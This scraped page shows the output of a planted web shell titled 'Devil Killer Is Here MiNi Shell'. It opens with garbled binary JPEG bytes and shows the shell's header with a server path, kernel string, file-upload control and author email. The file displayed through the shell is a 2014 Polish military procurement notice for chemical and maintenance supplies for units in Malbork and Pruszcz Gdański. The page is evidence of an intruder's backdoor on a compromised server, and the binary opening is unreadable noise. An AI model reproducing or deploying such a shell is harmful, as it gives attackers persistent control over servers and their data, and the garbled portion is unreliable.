JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/76914-N-2014.html

<p class="kh_header"><b>Malbork: Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Jednostki Wojskowej 1128 w Malborku i Jednostki Wojskowej 1300 w Pruszczu Gdańskim</b><br>
<b>Numer ogłoszenia: 76914 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1128 , ul. 17 Marca 20, 82-200 Malbork, woj. pomorskie, tel. 55 620 62 16, faks 55 620 62 75.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Jednostki Wojskowej 1128 w Malborku i Jednostki Wojskowej 1300 w Pruszczu Gdańskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Jednostki Wojskowej 1128 w Malborku i ednostki Wojskowej 1300 w Pruszczu Gdańskim. Przedmiot zamówienia podzielona na 6 Części. Zamawiający nie ogranicza części, w jakich Wykonawca może złożyć ofertę, przy czym oferty dotyczące poszczególnych części muszJą być kompletne. Szczegółowy opis i zakres przedmiotu zamówienia zawarty jest w formularzu cenowym dla poszczególnych części załącznik nr 6, 7, 8, 9, 10 i 11 do SIWZ. Część nr 1 Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Czołgowo Samochodowej, Część nr 2 Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Inżynieryjno Saperskiej i OPBMR, Część nr 3 Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Łączności, Część nr 4 Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby MPS, Część nr 5 Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Przeładunkowa i Zabezpieczenia Ruchu Wojsk, Część nr 6 Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Sekcji Zabezpieczenia Lotniczo Technicznego. Zamówienie obejmuje dostawę wraz z rozładunkiem towaru w miejsce wskazane przez odbiorcę, na terenie kompleksów Jednostki Wojskowej 1128 w Malborku i Jednostki Wojskowej 1300 w Pruszczu Gdańskim. Obowiązki Wykonawcy. Wykonawca zapewni bezpłatny transport i rozładunek towaru w miejsce wskazane przez odbiorcę na terenie kompleksów Jednostki Wojskowej 1128 w Malborku i Jednostki Wojskowej 1300 w Pruszczu Gdańskim. Terminy i miejsca dostaw zawarte są w załącznikach do każdego zadania oraz w rozdziale 6 SIWZ. Dostawy winne być realizowane w godzinach od 8.00 do 14.00 w dni robocze od poniedziałku do piątku. Wykonawca zobowiązany jest do odbioru pustych opakowań po telefonicznym ustaleniu terminu i miejsca podstawa art. 16 ust. 3 Ustawy z dnia 11 maja 2005 roku o opakowaniach i odpadach po opakowaniach Dz. U. Nr 63, poz. 638 z późn. Zm. Asortyment dostarczony przez Wykonawcę musi posiadać okres przydatności do użycia nie krótszy niż zawarty w załączniku Formularza cenowego do każdej Części załącznik nr 6, 7, 8, 9, 10 i 11 do SIWZ. Towar wadliwy nie zostanie przyjęty, a Wykonawca zobowiązany będzie odebrać i uzupełnić towar na swój koszt w terminie obowiązywania umowy. Wraz z dostawą towaru Wykonawca jest zobowiązany przedstawić informację o okresie przydatności do użycia danego produktu, jeśli nie będzie to wynikało z dostarczonych dokumentów lub opakowania. Na preparaty chemiczne będzie obowiązywać gwarancja producenta. Wykonawca zobowiązany jest wydać Zamawiającemu dokumenty gwarancyjne dostarczonych towarów, jeśli takich udzielił producent. Na towary, dla których producent nie określa terminu gwarancji, odpowiedzialność, za jakość dostarczonego towaru przejmuje Wykonawca przez okres 12 miesięcy od daty dostawy do Zamawiającego. W przypadku stwierdzenia w okresie gwarancji wad produkcyjnych dostarczonego towaru, Zamawiający zawiadamia Wykonawcę w formie Protokołu reklamacji o ujawnieniu wady. W tym przypadku Wykonawca wymieni towar na nowy, wolny od wad, w terminie 30 dni od daty otrzymania Protokołu reklamacji. Wykonawca na własny koszt i odpowiedzialność dokona odbioru wadliwego towaru wraz z Protokołem reklamacji załącznik nr 2 do projektu Umowy za pokwitowaniem. Koszt dostawy towaru nowego, wolnego od wad poniesie Wykonawca. Do każdego produktu chemicznego Wykonawca dostarczy w wersji papierowej karty charakterystyki preparatu niebezpiecznego w myśl ustawy z dnia 25 luty 2011 roku o substancjach chemicznych i ich mieszaninach Dz. U. 2011, Nr 63, poz. 322. Zamawiający wymaga, aby wymienione produkty były dostarczone w oryginalnych, nienaruszonych opakowaniach producenta, na których powinny być widoczne informacje dotyczące produkcji, terminu przydatności do użycia oraz parametrów technicznych. Zamawiający wymaga, aby dostarczone produkty były oznaczone zgodnie z danymi określonymi w Formularzu cenowym poszczególnych zadań  załącznik nr 6, 7, 8, 9, 10 i 11 do SIWZ. W przypadku braku takiego oznaczenia, Wykonawca przy dostawie towaru, zobowiązany jest przedstawić odpowiednią dokumentację w języku polskim potwierdzającą, że dostarczony asortyment spełnia wymagania Zamawiającego. Towar, którego identyfikacja nie będzie możliwa, nie zostanie przyjęty. W przypadku, gdy dostarczony towar w części lub w całości nie będzie odpowiadał opisowi określonemu w SIWZ Formularz cenowy załącznik nr 6, 7, 8, 9, 10 i 11 do SIWZ Zamawiający odmówi przyjęcia towaru, a Wykonawca zobowiązany będzie do dostarczenia towaru zgodnego z przedmiotem zamówienia w terminie trwania umowy na swój koszt. Dowodem zrealizowania dostawy będzie pisemne potwierdzenie przyjęcia towaru, dokonane przez upoważnionego pracownika Zamawiającego posprawdzaniu ilości, rodzaju i kompletności przedmiotu zamówienia. Do czasu odbioru dostawy przez upoważnionego pracownika Zamawiającego, ryzyko wszelkich niebezpieczeństw związanych z ewentualnym uszkodzeniem lub utrata środków czystości ponosi Wykonawca. Zamawiający dopuszcza zaoferowanie przez Wykonawcę asortymentu równoważnego w stosunku do artykułów opisanych przez Zamawiającego za pomocą nazw handlowych. Przez artykuły równoważne Zamawiający rozumie te, które posiadają takie same parametry lub lepsze jak artykuły wskazane przez Zamawiającego. W przypadku zaoferowania artykułów równoważnych Wykonawca zobowiązany jest do dostarczenia do oferty dokumentów potwierdzających, że zaoferowane artykuły posiadają takie same parametry lub lepsze jak artykuły wskazane przez Zamawiającego. W takich przypadkach oprócz wpisania w formularzu cenowym nazwy równoważnego produktu, Wykonawca dołączy do oferty opis techniczny równoważnego artykułu, kartę katalogową lub inny dokument potwierdzający spełnienie wymagań Zamawiającego. Zamawiający zastrzega, że ilość i wartość przedmiotu zamówienia może ulec zmniejszeniu. Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu dostarczenia mniejszej ilości towaru. W ramach Wartości zamówienia Zamawiający zastrzega sobie możliwość zmian ilościowych, w trakcie realizacji umowy, w poszczególnych pozycjach Formularza cenowego załącznik nr 6, 7, 8, 9, 10 i 11 do SIWZ. Brak opisu technicznego dla produktów równoważnych skutkować będzie odrzuceniem oferty Wykonawcy, jako niezgodne z SIWZ. Zapłata wynagrodzenia odbywać się będzie w terminie 30 dni od daty dostarczenia towaru wraz z fakturą, przelewem na rachunek bankowy wskazany przez Wykonawcę. Zamawiający wymaga, aby Wykonawca umieścił na fakturze następujące informacje numer umowy, której dotyczy faktura, numer Części zamówienia, której dotyczy faktura, nazwę produktu zgodną z dostarczonym asortymentem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 19.51.00.00-4, 24.00.00.00-4, 24.91.00.00-6, 24.96.00.00-1, 24.96.30.00-2, 31.43.10.00-6, 31.68.10.00-3, 42.66.20.00-4, 44.31.60.00-8, 44.51.20.00-2, 44.53.15.10-9, 44.81.00.00-1, 44.82.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków wymaganych przez Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, Formularz cenowy na wybrane Części nr 1, 2, 3, 4, 5 i 6 (załącznik nr 6, 7, 8, 9, 10 i 11 do SIWZ), Pełnomocnictwo osób podpisujących ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych (oryginał lub kopia poświadczona notarialnie),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.22blot.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA  WOJSKOWA 1128
ul. 17 Marca 20
82 - 200 MALBORK
budynek nr 11, pokój 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2014 godzina 10:00, miejsce: JEDNOSTKA  WOJSKOWA 1128 KANCELARIA JAWNA
ul. 17 Marca 20
82 - 200 MALBORK.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Czołgowo - Samochodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Czołgowo - Samochodowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.51.00.00-4, 24.96.00.00-1, 24.91.00.00-6, 44.31.60.00-8, 44.83.20.00-1, 44.83.12.00-6, 44.82.00.00-4, 44.81.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Inżynieryjno - Saperskiej i OPBMR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Inżynieryjno - Saperskiej i OPBMR.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.91.00.00-6, 24.96.00.00-1, 19.51.00.00-4, 24.96.30.00-2, 44.31.60.00-8, 44.83.00.00-1, 44.83.12.00-6, 44.82.00.00-4, 44.81.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Łączności.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Łączności.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 39.22.42.10-3, 44.83.21.00-2, 14.71.40.00-9, 31.73.10.00-9, 39.22.42.00-0, 44.51.15.10-3, 44.19.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby MPS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby MPS.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 39.22.42.10-3, 44.83.21.00-2, 14.71.40.00-9, 31.73.10.00-9, 39.22.42.00-0, 44.51.15.10-3, 44.19.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Przeładunkowa i Zabezpieczenia Ruchu Wojsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Służby Przeładunkowa i Zabezpieczenia Ruchu Wojsk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 39.22.42.10-3, 44.83.21.00-2, 14.71.40.00-9, 31.73.10.00-9, 39.22.42.00-0, 44.51.15.10-3, 44.19.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Sekcji Zabezpieczenia Lotniczo - Technicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa preparatów chemicznych, materiałów oraz sprzętu eksploatacyjnego dla Sekcji Zabezpieczenia Lotniczo - Technicznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.51.20.00-2, 31.68.10.00-3, 31.43.10.00-6, 44.31.60.00-8, 44.81.00.00-1, 44.31.64.00-2, 44.82.00.00-4, 44.83.20.00-1, 42.66.20.00-4, 44.53.15.10-9, 24.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com